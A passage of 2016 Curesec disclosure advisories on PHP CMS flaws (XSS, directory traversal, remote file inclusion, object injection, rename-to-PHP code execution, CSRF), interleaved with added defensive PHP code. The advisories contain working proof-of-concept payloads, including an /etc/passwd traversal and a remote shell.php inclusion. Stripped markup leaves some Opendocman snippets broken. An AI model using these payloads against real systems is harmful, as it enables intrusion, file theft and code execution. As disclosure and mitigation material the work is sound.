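var_dump(isset($user['legacy_salt']), password_verify('correct horse', $user['password']));

$tokens = [];
$raw = issueResetToken($tokens, 'uid-42', time());
var_dump(redeemResetToken($tokens, 'uid-42', 'not-the-token', time())); // false, and consumed
var_dump(redeemResetToken($tokens, 'uid-42', $raw, time()));            // false: already consumed
$raw = issueResetToken($tokens, 'uid-42', time());
var_dump(redeemResetToken($tokens, 'uid-42', $raw, time()));            // true
```

Storing only the token's hash means a database read (for instance through the SQL injection in the same version) does not yield usable reset links, and consuming the record before comparing it keeps a guessed token from being retried.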

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases new version
03/15/2016 Requested information about unfixed issues
03/15/2016 Vendor considers issues minor and will not fix them for now
09/15/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-CSRF-Weak-Hashing-Plaintext-Passwords-161.html
 

[FD] Kajona 4.7: XSS & Directory Traversal

2016-09-15 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Kajona 4.7
Fixed in:5.0
Fixed Version Link:  https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Vendor Website:  https://www.kajona.de/
Vulnerability Type:  XSS & Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable
to multiple XSS attacks and limited directory traversal.

The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.

The directory traversal issue gives information about which files exist on a
system, and thus allows an attacker to gather information about a system.

3. Details

XSS 1: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The function that parses admin requests echoes user input into a JavaScript
context without escaping, leading to reflected XSS. As the injection takes
place into a JavaScript context, browser filters will generally not be able to
filter out an attack.

In the case of Kajona, XSS may lead to code execution, as admins can upload PHP
files via the media manager.

Proof of Concept:


http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo='

Code:


core/module_system/system/class_request_dispatcher.php
$strReturn = "";

XSS 2: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The media manager echoes the form_element parameter into a JavaScript context
without escaping, leading to reflected XSS. As the injection takes place into a
JavaScript context, browser filters will generally not be able to filter out an
attack. Note that a valid systemid id is required.

Proof of Concept:


http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['#

Click on the "Accept" overlay of an image to trigger the injected code.

XSS 3: Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The "class_messageprovider_exceptions_enabled" parameter of the xml.php script
is vulnerable to reflected XSS.

Proof of Concept:


http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<%2fa>&messageprovidertype=class_messageprovider_exceptions

XSS 4: Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

When creating a comment, the subject is vulnerable to persistent XSS. The click
of an admin is required to execute the injected JavaScript code.

Proof of Concept:


1. Leave a comment:
http://localhost/kajona/index.php?page=postacomment

2. As subject, use:
');alert('1

3. Visit the comment overview:
http://localhost/kajona/index.php?admin=1&module=postacomment&action=list

4. Click edit on the comment

5. Click on "Edit Tags" (the second symbol from the right)

Directory Traversal

When viewing images, the file name is improperly sanitized, allowing for
directory traversal.

It is not possible to actually read out files, as there are additional checks
in place preventing that. But an unauthenticated attacker can still see which
files exist on a system and which do not, making it possible to collect
information for further attacks.

Proof of Concept:


GET /kajona/image.php?image=/files/images/upload///////download.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 200 (but not shown)

GET /kajona/image.php?image=/files/images/upload///////foobar.php&maxWidth=20&maxHeight=2 HTTP/1.1
-> 404

Code:


core/module_system/image.php
public function __construct() {
    //find the params to use
    $this->strFilename = urldecode(getGet("image"));
    //avoid directory traversing
    $this->strFilename = str_replace("../", "", $this->strFilename);
    [...]
}

[...]

private function resizeImage() {
    //Load the image-dimensions
    if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename, "/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) {

        [...]
    }

    class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND);
    class_response_object::getInstance()->sendHeaders();
}

4. Solution

To mitigate this issue please upgrade at least to version 5.0:

https://www.kajona.de/en/Downloads/downloads.get_kajona.html

Please note that a newer version might already be available.

5. Report Timeline

04/11/2016 Informed Vendor about Issue
04/13/2016 Vendor applies fix to github
05/25/2016 Vendor releases fixed version
09/15/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-T

[FD] Peel Shopping 8.0.2: Object Injection

2016-09-15 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Peel Shopping 8.0.2
Fixed in:8.0.3
Fixed Version Link:  www.peel-shopping.com
Vendor Website:  www.peel-shopping.com
Vulnerability Type:  Object Injection
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is
vulnerable to Object Injection.

Peel Shopping stores a PHP object in a cookie, which is then unserialized when
received by the application. An attacker can send arbitrary PHP objects and
thus has a limited influence on the control flow of the application. This can
for example lead to DOS attacks by creating an infinite loop.

3. Details

The last_views cookie is passed to unserialize, leading to Object Injection.
Authentication is not required.

The impact of the vulnerability is difficult to estimate, as it may increase
with the existence of further modules. Without any modules installed, it can at
a minimum lead to DOS.

Proof of Concept:

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 
Host: localhost 
Cookie: last_views=[INJECTED_OBJECT];

DOS Example: The Smarty_Internal_Configfileparser class can be used to create
an infinite loop.

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Cookie: last_views=%4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d;
Connection: close

(Payload URL decoded:
O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;s:11:"yyTokenName";a:0:{}})

4. Solution

To mitigate this issue please upgrade at least to version 8.0.3

Please note that a newer version might already be available.

5. Report Timeline

04/11/2016 Informed Vendor about Issue
04/12/2016 Vendor announces release of fix before 05/11/2016
09/14/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Peel-Shopping-802-Object-Injection-164.html
 

[FD] PivotX 2.3.11: Reflected XSS

2016-03-19 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:PivotX 2.3.11
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://pivotx.net/
Vulnerability Type:  Reflected XSS
Remote Exploitable:  Yes
Reported to vendor:  01/20/2016
Disclosed to public: 03/15/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to reflected XSS, allowing for the injection of JavaScript
keyloggers or the bypassing of CSRF protection. In the case of PivotX, this may
lead to code execution via other vulnerabilities in the same version in the
admin area.

3. Details

Description

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The additionalpath parameter of the file explorer is vulnerable to reflected
XSS.

Proof of Concept

http://localhost/pivotx_latest/pivotx/index.php?page=homeexplore&additionalpath=pivotalert(1)

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Reflected-XSS-155.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany



[FD] Zenphoto 1.4.11: RFI

2016-03-19 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Zenphoto 1.4.11
Fixed in:            1.4.12
Fixed Version Link:  https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Vendor Website:      http://www.zenphoto.org/
Vulnerability Type:  RFI
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 03/15/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.

3. Details

Description

CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C

When downloading a log file, the input is not properly sanitized, leading to
RFI.

An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.

In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.

Proof of Concept

GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1

Code

// admin-logs.php (sanitize(x, 3) only strips out tags)
case 'download_log':
    $zipname = sanitize($_GET['tab'], 3) . '.zip';
    if (class_exists('ZipArchive')) {
        $zip = new ZipArchive;
        $zip->open($zipname, ZipArchive::CREATE);
        $zip->addFile($file, basename($file));
        $zip->close();
        ob_get_clean();
        header("Pragma: public");
        header("Expires: 0");
        header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
        header("Cache-Control: private", false);
        header("Content-Type: application/zip");
        header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
        header("Content-Transfer-Encoding: binary");
        header("Content-Length: " . filesize($zipname));
        readfile($zipname);
        // remove zip file from temp path
        unlink($zipname);
        exit;
    } else {
        include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
        $zip = new ZipStream($zipname);
        $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
        $zip->finish();
    }
    break;

4. Solution

To mitigate this issue please upgrade at least to version 1.4.12:

https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip

Please note that a newer version might already be available.

5. Report Timeline

01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
 


[FD] PivotX 2.3.11: Directory Traversal

2016-03-19 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:PivotX 2.3.11
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://pivotx.net/
Vulnerability Type:  Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  01/20/2016
Disclosed to public: 03/15/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to Directory Traversal, allowing authenticated users to read and
delete files outside of the PivotX directory.

3. Details

Description

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

The function cleanPath which is responsible for sanitizing path names can be
bypassed by an attacker, leading to directory traversal in multiple places.

Proof of Concept

Admins and Superadmins can read any file:

http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=.././/...//.//...//.//...//.//...//.//...//.//...//etc/passwd

Advanced users, Admins and Superadmins can delete any file, possibly leading to
DOS:

http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.//...//.//...//.//...//.//...//.//...//.//...//important/important.file&pivotxsession=ovyyn4ob2jc5ym92

Code

lib.php
function cleanPath($path) {
    $path = str_replace('../', '', $path);
    $path = str_replace('..\\', '', $path);
    $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
    return $path;
}

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
 


[FD] BigTree 4.2.8: Object Injection & Improper Filename Sanitation

2016-03-19 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:BigTree 4.2.8
Fixed in:BigTree 4.2.9
Fixed Version Link:  https://www.bigtreecms.org/download/
Vendor Website:  https://www.bigtreecms.org/
Vulnerability Type:  Object Injection & Improper Filename Sanitation
Remote Exploitable:  Yes
Reported to vendor:  01/29/2016
Disclosed to public: 03/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

BigTree CMS is a CMS written in PHP. In version 4.2.8, it is vulnerable to
object injection. The impact of this vulnerability is currently small -
privileged users can update settings they are not allowed to update - but may
be more extensive depending on installed plugins.

In addition to the object injection, BigTree also has a function called
cleanFile which is supposed to prevent directory traversal, but which can be
bypassed. The function is not currently used by BigTree itself, but may be used
by plugins.

3. Object Injection

Description

CVSS: Low 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N

BigTree passes unvalidated user input to unserialize, leading to PHP object
injection. The vulnerability is in the backend, so a user account with the role
developer or admin is required. A successful exploitation may for example lead
to an admin editing settings they are not authorized to edit.

In BigTree, the admin role is less privileged than the developer role. For
example, an admin can only edit a subset of the settings.

The impact of the vulnerability is currently small, as BigTree does not
implement __wakeup in any classes, none of the classes implement the iterator
interface, and __destruct is only implemented in a limited number of classes,
and only one of the cases seems relevant to security: The destructor of the
BigTreeCMSBase class updates all settings, without again validating if the user
is allowed to update the setting and without re-validating the value of a
setting.

This may for example lead to persistent XSS - the admin does not have the right
to post scripts, as this would weaken the distinction between admins and
developers - by changing the colophon setting. An admin has the right to edit
this setting, but the input is HTML encoded before putting it in the database.
By bypassing this encoding, a malicious admin can inject scripts.

It should be noted that custom modules may contain classes that lead to a
bigger security impact of this vulnerability.

Proof of Concept

The attack can be achieved in a browser by visiting the following URL and
clicking on save:

http://localhost/BigTree-CMS/site/index.php/admin/trees/edit/2/?view_data=[INJECTED OBJECT]

A payload to update the setting "bigtree-internal-security-policy" may for
example be:

a:2:{s:7:"bigtree";O:14:"BigTreeCMSBase":2:{s:16:"AutoSaveSettings";a:1:{s:32:"bigtree-internal-security-policy";a:1:{s:3:"foo";s:3:"bar";}}s:15:"ModuleClassList";a:2:{s:9:"DemoTrees";s:5:"trees";s:10:"DemoQuotes";s:6:"quotes";}}s:4:"view";s:6:"foobar";}

The actual request is a POST request to /BigTree-CMS/site/index.php/admin/trees
/edit/process/, where the _bigtree_return_view_data field contains the base64
encoded payload.

Code

/process.php
$return_view_data = unserialize(base64_decode($_POST["_bigtree_return_view_data"]));
if (!$bigtree["form"]["return_view"] || $bigtree["form"]["return_view"] == $return_view_data["view"]) {
    $redirect_append = array();
    unset($return_view_data["view"]); // We don't need the view passed back.
    foreach ($return_view_data as $key => $val) {
        $redirect_append[] = "$key=".urlencode($val);
    }
    $redirect_append = "?".implode("&",$redirect_append);
}

/cms.php
function __destruct() {
    foreach ($this->AutoSaveSettings as $id => $obj) {
        if (is_object($obj)) {
            BigTreeAdmin::updateSettingValue($id,get_object_vars($obj));
        } else {
            BigTreeAdmin::updateSettingValue($id,$obj);
        }
    }
}
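The Peel Shopping advisory (last_views cookie) and this BigTree advisory (_bigtree_return_view_data field) share one sink: unserialize() on client-controlled data. The PHP below is an added example and belongs to neither project. It shows the vulnerable shape, a drop-in that refuses to instantiate classes where unserialize() cannot be replaced yet, and the preferred replacement, signed JSON, under which a client can only hand back what the server issued. It assumes PHP 7.0 or later for the allowed_classes option; the key, payloads and class name are constructed.

```php
<?php
// Added example, not Peel Shopping's or BigTree's code. Three ways to handle
// serialized client data: the vulnerable call, a class-free unserialize(),
// and signed JSON.

// Vulnerable shape: every class in the autoload path becomes reachable, and
// __wakeup/__destruct/iterator methods of whatever the attacker names will run.
function decodeVulnerable(string $raw)
{
    return unserialize($raw);
}

// Drop-in for code that cannot switch formats yet (PHP 7.0+): objects in the
// payload become __PHP_Incomplete_Class, which has no magic methods, and
// anything that is not the expected plain array is rejected.
function decodeArrayOnly(string $raw): ?array
{
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($value)) {
        return null;
    }
    array_walk_recursive($value, function ($leaf) {
        if (is_object($leaf)) { // an incomplete class nested inside the array
            throw new UnexpectedValueException('object in serialized data');
        }
    });
    return $value;
}

// Preferred: JSON carries no classes, and an HMAC (key stays server-side)
// makes the cookie tamper-evident. $key is a constructed secret.
function encodeSignedCookie(array $data, string $key): string
{
    $body = base64_encode(json_encode($data));
    return $body . '.' . hash_hmac('sha256', $body, $key);
}

function decodeSignedCookie(string $cookie, string $key): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$body, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $body, $key), $mac)) {
        return null; // forged or modified
    }
    $data = json_decode(base64_decode($body, true), true);
    return is_array($data) ? $data : null;
}

// Stand-alone demonstration with constructed payloads.
$key = 'constructed-server-secret';
$legit = encodeSignedCookie(['last_views' => [1, 7, 9]], $key);
var_dump(decodeSignedCookie($legit, $key));        // the array
var_dump(decodeSignedCookie($legit . 'x', $key));  // null: MAC mismatch

// Class name chosen for illustration only; it is not defined in this script.
$injected = 'a:1:{i:0;O:12:"SomeAppClass":1:{s:4:"prop";s:3:"foo";}}';
try {
    var_dump(decodeArrayOnly($injected));
} catch (UnexpectedValueException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
var_dump(decodeArrayOnly('a:1:{i:0;i:7;}')); // plain array accepted
```

The signed-JSON variant also closes the DOS case from the Peel Shopping advisory: no class is ever named by the client, so no parser or destructor can be steered into a loop, and an unsigned or edited cookie is discarded before any decoding happens.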

4. Improper Filename Sanitation

Description

The function cleanFile is supposed to prevent directory traversal, but
currently it does not fulfill its task, as an attacker can easily bypass the
filter via //. The function is currently not used for any sensitive tasks,
but it may be used by extensions or in the future.

Code

/*
    Function: cleanFile
        Makes sure that a file path doesn't contain abusive characters (i.e. ../)

    Parameters:
        file - A file name

    Returns:
        Cleaned up string.
*/

static function cleanFile($file) {
    return str_replace("../","",$file);
}
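Kajona's image.php, PivotX's cleanPath, BigTree's cleanFile and Zenphoto's log download all fail the same way: a filter strips "../" in one pass, or trusts a name once tags are removed, and the result is then used to touch the filesystem. The PHP below is an added example and belongs to none of these projects. It shows why a single-pass strip does not hold, then the two checks that do: canonicalise with realpath() and compare against the base directory (which also removes the exists/does-not-exist oracle the Kajona advisory describes, because both outcomes get the same answer), or look an identifier such as Zenphoto's tab up in an allowlist. The temporary directory tree is constructed by the script.

```php
<?php
// Added example, not Kajona's, Zenphoto's, PivotX's or BigTree's code.

// The filter pattern shared by cleanPath() and cleanFile(): one pass only.
function stripOnce(string $path): string
{
    return str_replace('../', '', $path);
}

// Resolve a user-supplied relative path under $base. Returns the real path or
// null. Outside-of-base and nonexistent both yield null, so the caller answers
// identically in both cases and cannot be used as an existence oracle.
function resolveUnderBase(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || $userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    $candidate = $baseReal . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\');
    $real = realpath($candidate); // collapses ".." and symlinks exactly as the OS will
    if ($real === false) {
        return null;
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// For a parameter that selects from a known set (a log name), do not sanitise:
// look the value up in an allowlist and build the path yourself.
function selectLogFile(string $logDir, string $tab, array $allowed): ?string
{
    return in_array($tab, $allowed, true) ? $logDir . DIRECTORY_SEPARATOR . $tab . '.log' : null;
}

// Stand-alone demonstration in a constructed temporary tree:
//   $base/images/pic.png   (inside the images base)
//   $base/secret.txt       (outside it)
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'traversal-demo-' . bin2hex(random_bytes(4));
mkdir($base . '/images', 0700, true);
touch($base . '/images/pic.png');
touch($base . '/secret.txt');

var_dump(stripOnce('....//secret.txt'));                         // "../secret.txt": the strip reassembles it
var_dump(resolveUnderBase($base . '/images', 'pic.png'));        // real path of pic.png
var_dump(resolveUnderBase($base . '/images', '../secret.txt'));  // null, although the file exists
var_dump(resolveUnderBase($base . '/images', 'missing.png'));    // null: the same answer as above
var_dump(selectLogFile($base, 'security', ['security', 'setup']));
var_dump(selectLogFile($base, 'http://example.invalid/x.php?', ['security', 'setup'])); // null

// Clean up the constructed tree.
unlink($base . '/images/pic.png');
unlink($base . '/secret.txt');
rmdir($base . '/images');
rmdir($base);
```

realpath() returns false for a path that does not exist, which is what makes the "missing" and "outside" cases indistinguishable to the client; if a check is needed before the file is created (an upload target), normalise the string lexically and apply the same prefix comparison instead.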

5. Solution

To mitigate this issue please upgrade at least to version 4.2.9:

https://www.bigtreecms.org/download/

Please note that a newer version might already be available.


[FD] PivotX 2.3.11: Code Execution

2016-03-19 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:PivotX 2.3.11
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://pivotx.net/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  01/20/2016
Disclosed to public: 03/15/2016
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to code execution by authenticated users because it does not check
the extension of files when renaming them.

3. Details

Description

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file upload functionality checks file extensions when uploading files to
prevent the uploading of malicious files such as PHP files. However, the rename
function does not check the extension of the new filename, leading to code
execution.

An account in the advanced users, admins, or superadmins role is required to
upload files.

Proof of Concept

1. Upload an image file containing PHP code with a valid extension such as png
2. Rename it so that it has a PHP extension: http://localhost/pivotx_latest/pivotx/index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer=shell.php
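The fix for a rename route is the same extension rule the upload route already applies, enforced on every path that produces a file name. The PHP below is an added example and not PivotX code; the allowlist and the temporary media directory it operates on are constructed.

```php
<?php
// Added example, not PivotX code. One name check, applied to upload and rename
// alike, and a rename confined to the media directory.

const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt']; // constructed allowlist

// Validate a file name a user asks to upload as, or rename to.
function isAcceptableMediaName(string $name): bool
{
    if ($name === '' || $name !== basename($name) || strpos($name, "\0") !== false) {
        return false; // path components or NUL bytes are never part of a media name
    }
    if (substr_count($name, '.') !== 1) {
        return false; // exactly one extension: "x.php.png" is a double extension some servers honour
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXTENSIONS, true);
}

// Rename inside $mediaDir; the old and the new name pass the same check.
function renameMedia(string $mediaDir, string $old, string $new): bool
{
    if (!isAcceptableMediaName($old) || !isAcceptableMediaName($new)) {
        return false;
    }
    $from = $mediaDir . DIRECTORY_SEPARATOR . $old;
    $to   = $mediaDir . DIRECTORY_SEPARATOR . $new;
    if (!is_file($from) || file_exists($to)) {
        return false;
    }
    return rename($from, $to);
}

// Stand-alone demonstration in a constructed temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'media-demo-' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
touch($dir . '/imageshell.png');

var_dump(renameMedia($dir, 'imageshell.png', 'shell.php'));     // false: php is not allowed
var_dump(renameMedia($dir, 'imageshell.png', 'shell.PHP'));     // false: compared case-insensitively
var_dump(renameMedia($dir, 'imageshell.png', '../shell.png'));  // false: path component
var_dump(renameMedia($dir, 'imageshell.png', 'image.jpg'));     // true
var_dump(is_file($dir . '/image.jpg'));

unlink($dir . '/image.jpg');
rmdir($dir);
```

Extension checks limit what the web server will execute, not what the file contains; serving the media directory with script execution disabled (no PHP handler for it) is the complementary control when the extension rule cannot be trusted alone.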

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Code-Execution-153.html
 


[FD] Opendocman 1.3.4: HTML Injection

2016-02-03 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Opendocman 1.3.4
Fixed in:1.3.5
Fixed Version Link:  http://www.opendocman.com/free-download/
Vendor Website:  http://www.opendocman.com/
Vulnerability Type:  HTML Injection
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 02/01/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

To defend against XSS and similar attacks, opendocman depends on a function
that filters all input to remove dangerous tags and attributes.

The filter does remove all simple approaches to XSS, but it still leaves an
attacker with large control over the look and functionality of the website.
This can lead to phishing attacks, privilege escalation, defacement, and may
lead to XSS with older browsers.

There are likely other possibilities for attackers. It is recommended to
HTML-encode user input before echoing it to mitigate these issues, instead of
relying on input filtering.

These issues are present across the application and are reflected as well as
persistent, for example via the profile or comments.

3. Proof of Concept

Privilege Escalation

A registered user can exploit this issue in combination with social engineering
to gain admin rights:

- Change any profile field, such as last name, to: 
Smith">http://localhost/opendocman-1.3.4/search.php/";>

Phishing & Defacement

Attacker-controlled elements can be shown in places where a user would only
expect application-controlled data, not user data, which can be used in
phishing attacks or to deface the website.

A simple example would be:

http://localhost/opendocman-1.3.4/search.php/";>http://evil.com"; style= 
"background: red; color: white">Security Alert: Please upgrade to the latest 
version here!http://localhost/opendocman-1.3.4/add.php
The same is possible when updating a user profile here:
http://localhost/opendocman-1.3.4//profile.php
It should be noted that by default, the registration is not open, but there is
an option to open registration for anyone.

4. Code

The problem exists across the application. A quick search reveals at least
these code snippets which are likely open to reflected attacks. Further
parameters are likely vulnerable as well. Additionally, all user input that is
persisted seems to be affected as well.

check-out.php:';
category.php:
rejects.php:echo '';
rejects.php:echo '';
search.php:http://www.opendocman.com/free-download/

Please note that a newer version might already be available.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for different issue for verification
01/13/2016 Confirmed fix
01/20/2016 Vendor requests more time to fix XSS issues
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-HTML-Injection-151.html
 


[FD] Opendocman 1.3.4: CSRF

2016-02-03 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Opendocman 1.3.4
Fixed in:1.3.5
Fixed Version Link:  http://www.opendocman.com/free-download/
Vendor Website:  http://www.opendocman.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 02/01/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

Opendocman does not have CSRF protection, which means that an attacker can
perform actions for an admin, if the admin visits an attacker controlled
website while logged in.

3. Proof of Concept

Add new Admin User:


  
http://localhost/opendocman-1.3.4/user.php"; method="POST" 
enctype="multipart/form-data">
  
  
  
  
  
  
  
  
  
  
  
  

  



4. Solution

To mitigate this issue please upgrade at least to version 1.3.5:

http://www.opendocman.com/free-download/

Please note that a newer version might already be available.
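Beyond upgrading, the general mitigation is a synchronizer token, and the same check covers the login form in the MyBB advisory above (login CSRF). The PHP below is an added example and not Opendocman's or MyBB's code: the server keeps a random token in the session, embeds it in every state-changing form, and rejects a POST whose copy does not match. An Origin/Referer check is included as an independent second layer. The session, the request arrays and the user store are simulated with plain arrays so that the script runs from the command line.

```php
<?php
// Added example, not Opendocman's or MyBB's code. Synchronizer token plus an
// Origin/Referer check, demonstrated against a constructed "create user" form.

function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // per session, not per request
    }
    return $session['csrf_token'];
}

function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// True only when the submitted token matches the one held in the session.
function csrfValid(array $session, array $post): bool
{
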